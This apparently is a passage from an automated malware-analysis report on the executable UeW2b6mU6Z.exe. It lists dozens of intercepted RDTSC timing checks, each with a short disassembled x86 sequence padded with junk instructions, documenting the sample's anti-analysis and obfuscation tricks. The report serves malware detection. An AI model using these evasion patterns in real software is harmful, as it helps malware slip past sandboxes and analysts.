Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1F56 second address: ED1F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1F64 second address: ED1F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F17B0CB1426h 0x0000000a jne 00007F17B0CB1426h 0x00000010 popad 0x00000011 jno 00007F17B0CB143Fh 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED2279 second address: ED227F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED227F second address: ED228C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F17B0CB1426h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED228C second address: ED22B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f js 00007F17B0FBC266h 0x00000015 jne 00007F17B0FBC266h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007F17B0FBC266h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED22B2 second address: ED22B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED255F second address: ED2563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED2829 second address: ED286A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F17B0CB1431h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F17B0CB1434h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 jmp 00007F17B0CB142Eh 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDC291 second address: EDC2BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC272h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F17B0FBC278h 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 jg 00007F17B0FBC26Eh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDB5BD second address: EDB5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDB5C2 second address: EDB5C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDBCCA second address: EDBD0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F17B0CB1426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F17B0CB1435h 0x00000011 pop ecx 0x00000012 pushad 0x00000013 jmp 00007F17B0CB1437h 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pop edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDBD0D second address: EDBD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FBC278h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDBE90 second address: EDBE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE3E4F second address: EE3E58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE3E58 second address: EE3E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE4103 second address: EE412A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F17B0FBC26Ch 0x00000010 jg 00007F17B0FBC266h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE455F second address: EE4565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE4565 second address: EE4569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE484F second address: EE4853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE4853 second address: EE486B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F17B0FBC26Ah 0x0000000d jnc 00007F17B0FBC266h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE4B55 second address: EE4B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1436h 0x00000007 jmp 00007F17B0CB142Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE5234 second address: EE5238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE5238 second address: EE523C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE523C second address: EE5246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE5246 second address: EE524C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EEC813 second address: EEC81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F17B0FBC266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EEC81D second address: EEC821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EEC821 second address: EEC83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F17B0FBC274h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EF99E1 second address: EF9A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F17B0CB1431h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17B0CB142Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EFC52C second address: EFC532 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F083DC second address: F083F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jc 00007F17B0CB1426h 0x0000000c jc 00007F17B0CB1426h 0x00000012 jo 00007F17B0CB1426h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F083F5 second address: F083FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F17B0FBC266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F0F5CA second address: F0F5DF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17B0CB1426h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F17B0CB1456h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F0F5DF second address: F0F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F15721 second address: F15725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F15725 second address: F15729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F15729 second address: F1573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F17B0CB142Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1573B second address: F15744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F15744 second address: F1574A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1574A second address: F1574F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1574F second address: F15756 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B444 second address: F1B44E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F17B0FBC266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B44E second address: F1B45E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F17B0CB1426h 0x0000000a jbe 00007F17B0CB1426h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B45E second address: F1B474 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B5A2 second address: F1B5AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F17B0CB1426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B877 second address: F1B87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B87C second address: F1B891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB1431h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B891 second address: F1B8B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F17B0FBC277h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BA6A second address: F1BA6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BBEE second address: F1BBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BBF4 second address: F1BC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F17B0CB1426h 0x0000000d js 00007F17B0CB1426h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BC07 second address: F1BC0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BC0B second address: F1BC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BC13 second address: F1BC2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F17B0FBC276h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1C8FC second address: F1C900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1FDAE second address: F1FDBC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F17B0FBC26Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F21D87 second address: F21DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F17B0CB1426h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007F17B0CB1426h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F3437B second address: F3437F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5B9AC second address: F5B9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5B642 second address: F5B669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jnp 00007F17B0FBC268h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F17B0FBC276h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5B669 second address: F5B6B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1434h 0x00000007 jmp 00007F17B0CB1435h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F17B0CB142Ch 0x00000017 jns 00007F17B0CB142Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D360 second address: F5D3A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F17B0FBC274h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F17B0FBC26Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F17B0FBC275h 0x00000022 jl 00007F17B0FBC266h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D3A4 second address: F5D3BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1431h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D3BB second address: F5D3EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F17B0FBC274h 0x0000000a jmp 00007F17B0FBC279h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D16E second address: F5D176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D176 second address: F5D1A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC272h 0x00000007 jmp 00007F17B0FBC275h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D1A4 second address: F5D1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007F17B0CB1426h 0x0000000f jmp 00007F17B0CB142Eh 0x00000014 pushad 0x00000015 popad 0x00000016 ja 00007F17B0CB1426h 0x0000001c popad 0x0000001d jmp 00007F17B0CB1435h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5FF66 second address: F5FF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5FF6B second address: F5FF85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB1436h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5FF85 second address: F5FF89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5FF89 second address: F5FFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F17B0CB1438h 0x00000010 stc 0x00000011 push 00000004h 0x00000013 add edx, dword ptr [ebp+1248C2A7h] 0x00000019 push A2E76742h 0x0000001e pushad 0x0000001f pushad 0x00000020 jmp 00007F17B0CB142Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5FFC8 second address: F5FFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007F17B0FBC266h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F60226 second address: F6024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F17B0CB1435h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F6024B second address: F6024F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F6024F second address: F60255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F60255 second address: F6025F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F17B0FBC266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F6025F second address: F6028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F17B0CB1430h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007F17B0CB142Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F63347 second address: F63357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007F17B0FBC26Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F62E3C second address: F62E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jnc 00007F17B0CB1426h 0x0000000d jng 00007F17B0CB1426h 0x00000013 jmp 00007F17B0CB1434h 0x00000018 popad 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jc 00007F17B0CB142Ch 0x00000022 jg 00007F17B0CB1437h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F62E8A second address: F62E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F64FF6 second address: F65003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jno 00007F17B0CB1426h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420E6A second address: 5420EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17B0FBC273h 0x00000009 xor si, 39AEh 0x0000000e jmp 00007F17B0FBC279h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EAC second address: 5420EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EB0 second address: 5420EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EB4 second address: 5420EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EBA second address: 5420EE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F17B0FBC26Ah 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F17B0FBC273h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EE3 second address: 5420EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EE7 second address: 5420EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410CED second address: 5410CF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
